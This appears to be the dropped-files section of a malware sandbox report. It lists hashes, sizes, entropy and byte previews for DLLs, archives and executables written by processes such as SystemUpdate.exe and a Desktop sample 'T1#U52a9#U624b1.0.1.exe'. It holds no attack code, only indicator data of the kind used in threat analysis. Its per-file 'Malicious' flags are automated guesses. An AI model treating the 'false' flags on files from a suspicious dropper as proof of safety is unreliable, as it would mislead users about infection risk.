                                                                                                                      SHA-512:AD07ACFCA13BA1D406547F826E97210D6083C12FB276D2A1002F9EDC7E81CF2062262094212B2FF77F7E45DE2AFD94254E2690BDC0B0A338C1917D3F2587D761
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3399200
                                                                                                                      Entropy (8bit):6.094152840203032
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:R3+YyRoAK2rXHsoz5O8M1CPwDv3uFh+r:t9yWAK2zsozZM1CPwDv3uFh+r
                                                                                                                      MD5:CC4CBF715966CDCAD95A1E6C95592B3D
                                                                                                                      SHA1:D5873FEA9C084BCC753D1C93B2D0716257BEA7C3
                                                                                                                      SHA-256:594303E2CE6A4A02439054C84592791BF4AB0B7C12E9BBDB4B040E27251521F1
                                                                                                                      SHA-512:3B5AF9FBBC915D172648C2B0B513B5D2151F940CCF54C23148CD303E6660395F180981B148202BEF76F5209ACC53B8953B1CB067546F90389A6AA300C1FBE477
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32792
                                                                                                                      Entropy (8bit):6.3566777719925565
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
                                                                                                                      MD5:EEF7981412BE8EA459064D3090F4B3AA
                                                                                                                      SHA1:C60DA4830CE27AFC234B3C3014C583F7F0A5A925
                                                                                                                      SHA-256:F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
                                                                                                                      SHA-512:DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):689184
                                                                                                                      Entropy (8bit):5.526574117413294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:1SurcFFRd4l6NCNH98PikxqceDotbA/nJspatQM5eJpAJfeMw4o8s6U2lvz:1KWZH98PiRLsAtf8AmMHogU2lvz
                                                                                                                      MD5:BC778F33480148EFA5D62B2EC85AAA7D
                                                                                                                      SHA1:B1EC87CBD8BC4398C6EBB26549961C8AAB53D855
                                                                                                                      SHA-256:9D4CF1C03629F92662FC8D7E3F1094A7FC93CB41634994464B853DF8036AF843
                                                                                                                      SHA-512:80C1DD9D0179E6CC5F33EB62D05576A350AF78B5170BFDF2ECDA16F1D8C3C2D0E991A5534A113361AE62079FB165FFF2344EFD1B43031F1A7BFDA696552EE173
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4207672
                                                                                                                      Entropy (8bit):6.417541998036932
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:nRxxZK/eCt7uD6OOfC4xHpgFaDPsgAJO7K7rLUVWqoeAumLg2IXCIzIpg4HwJMYZ:PxZex7t8z7YUI2p5HAMYM60u
                                                                                                                      MD5:B8A6AA94B49A9230F554A15EE6E58B63
                                                                                                                      SHA1:BBB48404391262242F2DC3B7FEC045283A2C4416
                                                                                                                      SHA-256:021F222F0BACACC490081F5A37BD78148E34F22FABE89587E1E0C6841390B7C5
                                                                                                                      SHA-512:464D702B1291FD392CE767130F054A0D32B024480FFE4AD60FBC5CC6735031BE28D1839DB530F7A20B03B3EDA782D324482F38111D9E9AFC2CAE3579F07E52C2
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28216
                                                                                                                      Entropy (8bit):6.1395240404041544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:S2wz1IkXvwhtHqS7tm7bNIXqGwDG4yycfUf2hm:S9IkXohtKS7tm7bNIXqG8yFUfp
                                                                                                                      MD5:F3702DFAFFAD5D95AC7022ABF84440F3
                                                                                                                      SHA1:A78D5994AAD9A82B8CFAFF1EF4EABA38BAB9CE7E
                                                                                                                      SHA-256:CEA18E860D251FBF4E9BF6E8689BA23B43DB4CDB9FD421270E8ED1C3B1AA4401
                                                                                                                      SHA-512:07CADC08BFB86633C8D54B717FB06217AF0C586DDADE537A6000AE662D2ADBD3107E30D32F28130041357D108EAF1F67A13AE3858BE0D18DAF2123666D2C26C5
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1098296
                                                                                                                      Entropy (8bit):5.34438566669037
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:9Q9e3qQOZ63191SnFRFotduNYBjCmN/XlyCAx9++bBlhJk93cgewrxEeBkmi:9Q9e3GS4olhCc/+9nbDhG2wrxkmi
                                                                                                                      MD5:B36DBBFDBE686F33D50414C288C1ACB8
                                                                                                                      SHA1:B389D6A8BDD9BB7D2B579A48E8E9BA94FCA499BF
                                                                                                                      SHA-256:5ED7787555704626DA817B872C60EAC09B984FFDF00D5AACDF06B6D9A935B105
                                                                                                                      SHA-512:7AD66BB84B38B8153279C17AC80BE44D0F3B96A937A906FB2DCAF664FBB9D0CB696A0D8AD8942951E68EF6B7AC7855FBC5B59BCA03D262471B9F74809DB5AC91
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):94088
                                                                                                                      Entropy (8bit):6.4315064777018955
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:bS6NH9M7vShoxXqYGZLAy10i5XNS83NT/sM9MYDiRecbbVKKoB98:bFRmxXqX0yvX7mHYWRecbb8l
                                                                                                                      MD5:7942BE5474A095F673582997AE3054F1
                                                                                                                      SHA1:E982F6EBC74D31153BA9738741A7EEC03A9FA5E8
                                                                                                                      SHA-256:8EE6B49830436FF3BEC9BA89213395427B5535813930489F118721FD3D2D942C
                                                                                                                      SHA-512:49FBC9D441362B65A8D78B73D4FDCF988F22D38A35A36A233FCD54E99E95E29B804BE7EABE2B174188C7860EBB34F701E13ED216F954886A285BED7127619039
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):87608
                                                                                                                      Entropy (8bit):6.406217429501724
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:m9txcZQWVujgkdI0Ls7PacKYyTFQ+DM9D8VXBPpt3nl7+xIX4VfybUfA:MvkQAFis7acHyTFNDM6VXBPpt3oxIX4I
                                                                                                                      MD5:6FD0281BCA7EEE0F354A91F958714EDB
                                                                                                                      SHA1:C7F643955D589F6D3093459327DCAAB3B7AE4A32
                                                                                                                      SHA-256:03D8966F4D8AB347140A3AD9938FB91DB11E01E028E980721451070EB0483CF7
                                                                                                                      SHA-512:86B2944ACAC0601273A7534B5698991ED0475CC3F913F179FAD27AA8CB7732EA56D9E70B6E959FB55795384ED652565586B8A10474864DAA4874321F31B4A416
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8.8.Y.k.Y.k.Y.k.!Rk.Y.k#(.j.Y.k...k.Y.k#(.j.Y.k#(.j.Y.k#(.j.Y.k.+.j.Y.k.1.j.Y.k.Y.k.Y.k.+.j.Y.k.+.j.Y.k.+>k.Y.k.+.j.Y.kRich.Y.k........................PE..d...B.._.........." .........h.....................................................rh....`..........................................&..H...8'.......`.......P..L....8..8....p..........T...............................8...............H............................text............................... ..`.rdata..2C.......D..................@..@.data........@......................@....pdata..L....P....... ..............@..@.rsrc........`.......*..............@..@.reloc.......p.......6..............@..B........................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):47672
                                                                                                                      Entropy (8bit):5.989015440500447
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:ombGJMgxzB7992zIyYsw3jY2rV4h6lievW4SJIXsI7mDG4yYBUf2h:omaJxxVMn0cs4mfv4JIXsI7yy+Uf
                                                                                                                      MD5:3400DA54FAF3C3128F9C9E126A881BE0
                                                                                                                      SHA1:6352074113ECB5B5ECF0442D70898F2ACB933E91
                                                                                                                      SHA-256:68913D6D5102D32DDDF5A21A4770AC2791F29106C0D2D3A3D0192356EA366C66
                                                                                                                      SHA-512:D9D9CA6A27792AF60E36FAB9D623BCDD9727EFD565CD8C3787DA70F10E168DED90D9208F9C9C56A5815AB316779DC05DC799FBF8E327C9EF18765C6C529886C4
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...............|M.....Nu......Nu......Nu......Nu......fv......l......km.............fv......fv......fv!.....fv......Rich............................PE..d...B.._.........." .....B...\.......1...............................................(....`.........................................@...P...............................8...........4h..T............................h..8............`...............................text...6@.......B.................. ..`.rdata...5...`...6...F..............@..@.data...x............|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):163896
                                                                                                                      Entropy (8bit):6.761466336533283
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:w4V6lmD0H/D/D55QufWicmvCcr6ayP4znfY9mNoBnCsYIXznxIXH1bi:w4V6lmD0fD/bBym2ZmgYOB0IDn4i
                                                                                                                      MD5:0CAA4DA7B74FC8E8F08BA736274BDB46
                                                                                                                      SHA1:4B46DC22C81FA3558537249C994614DEF1FD8CCE
                                                                                                                      SHA-256:167C5550B93541C703C8AFEB4D912719D5039230A7EFCE8F4BC500F175252ED8
                                                                                                                      SHA-512:47F1F338EA4055A4B88691EBB511EE95D29943AA7D519A7D5F513BEF26641990C1F31AD2839E7ED0342A5A262255B770CA922F7D173C998E0FF11C594BF8EFAB
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H..d...7...7...7..P7...7...6...7...6...7...6...7...6...7...6...7W..6...7...7m..7...66..7...6...7..<7...7...6...7Rich...7................PE..d...J.._.........." .....|...........3....................................................`.........................................P7..L....7..x............`.......b..8.......4.......T...........................p...8...............0............................text...y{.......|.................. ..`.rdata..v...........................@..@.data........P.......4..............@....pdata.......`.......<..............@..@.rsrc................T..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):79928
                                                                                                                      Entropy (8bit):6.1131945752612955
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:UysqI4cNSk1ZyCvebpgA1l9/s+7+p6txRjDouj7NIXVwbyKUf7:DsqI4M92KA1l9/se+p6xRPoM7NIXVwA
                                                                                                                      MD5:49F417DE4AAAE069D5B2D5D5A4DDABE1
                                                                                                                      SHA1:56772FE3D3A7F7865D412E3B27C11EC7E7C9E3C1
                                                                                                                      SHA-256:F1930CA4C78029FB41F3F661194B9D3001D0A99F45D68BF3A4A87D9EA36AAD20
                                                                                                                      SHA-512:83F5BE813CB8C0D738DBC27AB45AC561AA0DFE65C5CAF72F47A72E3AFA05E7E750AC63CF9A42A983A86CE33B25BB1426E0B2E78D62598616FD040B72C34419F4
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6Ua.r4..r4..r4..{L..v4...E..p4...E..~4...E..z4...E..q4...F..p4..)\..u4..r4...4...F..s4...F..s4...F..s4...F..s4..Richr4..........PE..d...D.._.........." .....x..........(........................................`.......S....`.............................................P............@.......0..8.......8....P..........T...........................`...8............................................text....w.......x.................. ..`.rdata..2w.......x...|..............@..@.data...............................@....pdata..8....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):155192
                                                                                                                      Entropy (8bit):5.907666632454038
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:TFGRolFoltLCzqjPPwedc54KyQ004OazdstGnBYi5qRW46ayfxIX47:hLKt+zqjww8yQlazdkW46a2
                                                                                                                      MD5:4DDF64B25544D11A28215052A394B457
                                                                                                                      SHA1:8C9D674F5CD29BA44FC6F525A184CBB7934FE006
                                                                                                                      SHA-256:B673E41306D6DF496151017ECB153A69E0BE509B448697D70427AC82C1664974
                                                                                                                      SHA-512:231BBE17BF1E5BF0173E396EA3703F93A48404A08EB6665F1F20C3D107B7370859FFF2B5EC5F2515A47F7541BA3426EACA624EE1E13B1BF9DA38EDC3177DEA7A
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4..4..4..Lt..4.`E..4.`E..4.`E..4.`E..4.HF..4.E]..4.\..4..4.5.HF..4.HF..4.HF...4.HF..4.Rich.4.........PE..d...E.._.........." .........................................................p............`.............................................d............P.......@.......@..8....`..........T...............................8............................................text............................... ..`.rdata..............................@..@.data....k.......f..................@....pdata.......@......................@..@.rsrc........P.......&..............@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1031497
                                                                                                                      Entropy (8bit):5.502190327886212
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:fhidbLtosQNRs54PK4IMeVw59bfCEzX87EE42YR32DA:fhidbLtosQNRs54PK4IS9k7Ed2KKA
                                                                                                                      MD5:5BA5437734D814562E982F736DE3EEC8
                                                                                                                      SHA1:9E354A7C3C4562925203C29853E4D716A1D7AF7C
                                                                                                                      SHA-256:AE725DFCF77CA5E40CFE8B87453305F735ECE6E76494CE22A89A0C10FEEC4886
                                                                                                                      SHA-512:AD07ACFCA13BA1D406547F826E97210D6083C12FB276D2A1002F9EDC7E81CF2062262094212B2FF77F7E45DE2AFD94254E2690BDC0B0A338C1917D3F2587D761
                                                                                                                      Malicious:false
                                                                                                                      Preview:PK..........!...7............._bootlocale.pycU....................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin....A
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3399200
                                                                                                                      Entropy (8bit):6.094152840203032
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:R3+YyRoAK2rXHsoz5O8M1CPwDv3uFh+r:t9yWAK2zsozZM1CPwDv3uFh+r
                                                                                                                      MD5:CC4CBF715966CDCAD95A1E6C95592B3D
                                                                                                                      SHA1:D5873FEA9C084BCC753D1C93B2D0716257BEA7C3
                                                                                                                      SHA-256:594303E2CE6A4A02439054C84592791BF4AB0B7C12E9BBDB4B040E27251521F1
                                                                                                                      SHA-512:3B5AF9FBBC915D172648C2B0B513B5D2151F940CCF54C23148CD303E6660395F180981B148202BEF76F5209ACC53B8953B1CB067546F90389A6AA300C1FBE477
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K..K..K..;K..K...J..K...J..K...J..K...J..K...J..K..Kb.Kd..J..Kd..J..Kd..J..Kd.WK..Kd..J..KRich..K........................PE..d......^.........." .....R$..........r.......................................`4......~4...`.........................................`...hg...3.@.....3.|.....1.......3. .....3..O...m,.8............................m,...............3..............................text...GQ$......R$................. ..`.rdata.......p$......V$.............@..@.data....z...P1..,...41.............@....pdata..P.....1......`1.............@..@.idata...#....3..$....3.............@..@.00cfg........3......@3.............@..@.rsrc...|.....3......B3.............@..@.reloc..fx....3..z...J3.............@..B................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):689184
                                                                                                                      Entropy (8bit):5.526574117413294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:1SurcFFRd4l6NCNH98PikxqceDotbA/nJspatQM5eJpAJfeMw4o8s6U2lvz:1KWZH98PiRLsAtf8AmMHogU2lvz
                                                                                                                      MD5:BC778F33480148EFA5D62B2EC85AAA7D
                                                                                                                      SHA1:B1EC87CBD8BC4398C6EBB26549961C8AAB53D855
                                                                                                                      SHA-256:9D4CF1C03629F92662FC8D7E3F1094A7FC93CB41634994464B853DF8036AF843
                                                                                                                      SHA-512:80C1DD9D0179E6CC5F33EB62D05576A350AF78B5170BFDF2ECDA16F1D8C3C2D0E991A5534A113361AE62079FB165FFF2344EFD1B43031F1A7BFDA696552EE173
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......T...T...T...T...TS.U...TZ.U...TS.U...TS.U...TS.U...T..U...T...T.T..U-..T..U...T..uT...T..U...TRich...T........PE..d......^.........." .....(...H.......%..............................................H.....`..............................................N..85..........s........K...j.. .......L.......8............................................ ..8............................text....&.......(.................. ..`.rdata...%...@...&...,..............@..@.data...!M...p...D...R..............@....pdata..TT.......V..................@..@.idata...V... ...X..................@..@.00cfg...............D..............@..@.rsrc...s............F..............@..@.reloc..5............N..............@..B................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4207672
                                                                                                                      Entropy (8bit):6.417541998036932
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:nRxxZK/eCt7uD6OOfC4xHpgFaDPsgAJO7K7rLUVWqoeAumLg2IXCIzIpg4HwJMYZ:PxZex7t8z7YUI2p5HAMYM60u
                                                                                                                      MD5:B8A6AA94B49A9230F554A15EE6E58B63
                                                                                                                      SHA1:BBB48404391262242F2DC3B7FEC045283A2C4416
                                                                                                                      SHA-256:021F222F0BACACC490081F5A37BD78148E34F22FABE89587E1E0C6841390B7C5
                                                                                                                      SHA-512:464D702B1291FD392CE767130F054A0D32B024480FFE4AD60FBC5CC6735031BE28D1839DB530F7A20B03B3EDA782D324482F38111D9E9AFC2CAE3579F07E52C2
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.s.vn..vn..vn......nn......tn......{n......}n......~n......rn..-...}n..vn..,o......n......wn......wn......wn..Richvn..................PE..d......_.........." ..........".....$.........................................B.....c.@...`...........................................8.....Xs9.|....`B......`@.......@.8....pB.Dt..Lb!.T............................b!.8............. .`............................text............................... ..`.rdata..,..... .....................@..@.data.........9.......9.............@....pdata.......`@.......=.............@..@.rsrc........`B.......?.............@..@.reloc..Dt...pB..v....?.............@..B........................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28216
                                                                                                                      Entropy (8bit):6.1395240404041544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:S2wz1IkXvwhtHqS7tm7bNIXqGwDG4yycfUf2hm:S9IkXohtKS7tm7bNIXqG8yFUfp
                                                                                                                      MD5:F3702DFAFFAD5D95AC7022ABF84440F3
                                                                                                                      SHA1:A78D5994AAD9A82B8CFAFF1EF4EABA38BAB9CE7E
                                                                                                                      SHA-256:CEA18E860D251FBF4E9BF6E8689BA23B43DB4CDB9FD421270E8ED1C3B1AA4401
                                                                                                                      SHA-512:07CADC08BFB86633C8D54B717FB06217AF0C586DDADE537A6000AE662D2ADBD3107E30D32F28130041357D108EAF1F67A13AE3858BE0D18DAF2123666D2C26C5
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B..O,..O,..O,..7...O,.0>-..O,.0>)..O,.0>(..O,.0>/..O,..=-..O,..'-..O,..O-..O,..=!..O,..=,..O,..=...O,..=...O,.Rich.O,.........................PE..d...1.._.........." .........4......X.....................................................`..........................................@..L....A..x....p.......`.......P..8.......8....2..T........................... 3..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..8............N..............@..B................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\SystemUpdate.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1098296
Entropy (8bit): 5.34438566669037
Encrypted: false
SSDEEP: 12288:9Q9e3qQOZ63191SnFRFotduNYBjCmN/XlyCAx9++bBlhJk93cgewrxEeBkmi:9Q9e3GS4olhCc/+9nbDhG2wrxkmi
MD5: B36DBBFDBE686F33D50414C288C1ACB8
SHA1: B389D6A8BDD9BB7D2B579A48E8E9BA94FCA499BF
SHA-256: 5ED7787555704626DA817B872C60EAC09B984FFDF00D5AACDF06B6D9A935B105
SHA-512: 7AD66BB84B38B8153279C17AC80BE44D0F3B96A937A906FB2DCAF664FBB9D0CB696A0D8AD8942951E68EF6B7AC7855FBC5B59BCA03D262471B9F74809DB5AC91
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 5387223
Entropy (8bit): 7.985206938856671
Encrypted: false
SSDEEP: 98304:AfXpzoLLJ3TbwaVvrZE0I8VkgCPOGCWxMa7kC9dob2MlVJqL2k+m7:Av9onJ5hrZEAktPOKjPob2M7YL
MD5: 6BDDA8BA15F8F472FE7D065689E7D35D
SHA1: 95D44FF3A6E24F1A53BA0DB640A08A727C864109
SHA-256: 55DC50526FF1F3265E54280421BD518B15A8D7475C8A91744D8FE6FFA9AA7C4D
SHA-512: D0FD1482054E1408E374CEB30D5C400B6E5D8CB48B0DCFEB4F0364E35D46F3146CDAF78A3D7BB997E25054EB044DCEACD84FEFED9379CC6D020EF9B0BA5FF5CF
Malicious: true
Process: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 19293911
Entropy (8bit): 7.626940406045079
Encrypted: false
SSDEEP: 393216:99uDI2bmAyYMF3hsZP4Mk0WCXCEqyJDDUSyE+r9QfPsilLI1z0tC3I0Coipi20Ua:7uDI2bmfYuhIfWjQflorgu1zXjCoDiyu
MD5: EFDC5DBA52333C0F5EEEDB0308FBE2D0
SHA1: 302AB4512EC697F95CD23C9001D04C43AF18E07E
SHA-256: D318CA324ED55593629D9D4B59E72A0D61E47F855714EB4A128FADC07D1F4363
SHA-512: 62D69091E7E5F73DA141B716DABA26B1AE168FF7AFDDAB08F1378F35719A6ED3E10D199806FB58F6BEE9AB006F6CDCA428B7ECEA5A7ED49C0168C1E4C46905AA
Malicious: true
Process: C:\Users\user\AppData\LineInst.exe
File Type: Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1938
Entropy (8bit): 5.266003803096758
Encrypted: false
SSDEEP: 48:xRO04H4DeYpCP7A94abTzQvy0s3n3eaPFHDhFDwDgEqu0eY030pa:xQ04H4iY0P7A94abTzQvy0s3nOaPFHl4
MD5: ED88C1BD8C3C7C48784B38C300BC105F
SHA1: 7415E90D7A1C98581F64E536850A9629F9F89EAB
SHA-256: 340213F7E1FE9EFB0B60BF93939C821ABBB5CA05AA98D1F37B3D6E04903B0496
SHA-512: FD288F04C43DF70DCC7729C96BAC44DDB74C298119E5684D6EAE1A6131B96F4CDF370E13378833275800044497CE08F155BEC2606EE0BD0CEA5CD87300BCF106
Malicious: false
Preview: .2024-12-29 07:39:05: BuildInfo: [10.0.19041.572 (vb_release_svc_prod1.201007-1724)]..2024-12-29 07:39:05: CommandLine: [C:\Users\user\AppData\Roaming\../LineInst.exe]..2024-12-29 07:39:05: Opening Box: [C:\Users\user\AppData\LineInst.exe]..2024-12-29 07:39:05: Opening Box Result: [0x0]..2024-12-29 07:39:05: Deleting box result.....2024-12-29 07:39:06: Creating path: [C:\$Windows.~WS\Sources].....2024-12-29 07:39:06: Checking cleanup registry value.....2024-12-29 07:39:06: Cleanup value missing... assuming no cleanup...2024-12-29 07:39:06: Skipping cleanup...2024-12-29 07:39:06: Preserve working path: [No]..2024-12-29 07:39:06: Cleaning alternate storage paths.....2024-12-29 07:39:06: Cleaning MoSetup Volatile key.....2024-12-29 07:39:06: Removing CorrelationVector registry value.....2024-12-29 07:39:06: Removing cleanup registry value.....2024-12-29 07:39:06: Flushing MoSetup registry key.....2024-12-29 07:39:06: Cleaning working dir.....2024-12-29 07:39:06: Attempting to preserve
Process: C:\$Windows.~WS\Sources\SetupHost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.09695366570663645
Encrypted: false
SSDEEP: 6:zGYl+GJXx2EuMclF6vMclFq5zweHa1xaylzE5Zm3n+Sk4DtLJz7:a6Xx2HF69Fq5zC1xaME5Z2+kDPH
MD5: 90F1E01CE360CE074DB195C29ABB10DD
SHA1: 914741177E3A4226A4E7C694F55F774383AC8980
SHA-256: 4C3E456448BCD1AB516CFC50942457FE4094289E520975E373C0A66537C4C150
SHA-512: F7725C23234E84F8876146E2A445023F62FE650DB6D3C3FA85F53C50601B90BCA0E53AA4343B4D8CBEE9602CAF530C4BE6CBDD1667871A9C91379571E6235296
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: JSON data
Category: dropped
Size (bytes): 55
Entropy (8bit): 4.306461250274409
Encrypted: false
SSDEEP: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5: DCA83F08D448911A14C22EBCACC5AD57
SHA1: 91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256: 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512: 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious: false
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (524)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):980
                                                                                                                      Entropy (8bit):5.221020544248936
                                                                                                                      Encrypted:false
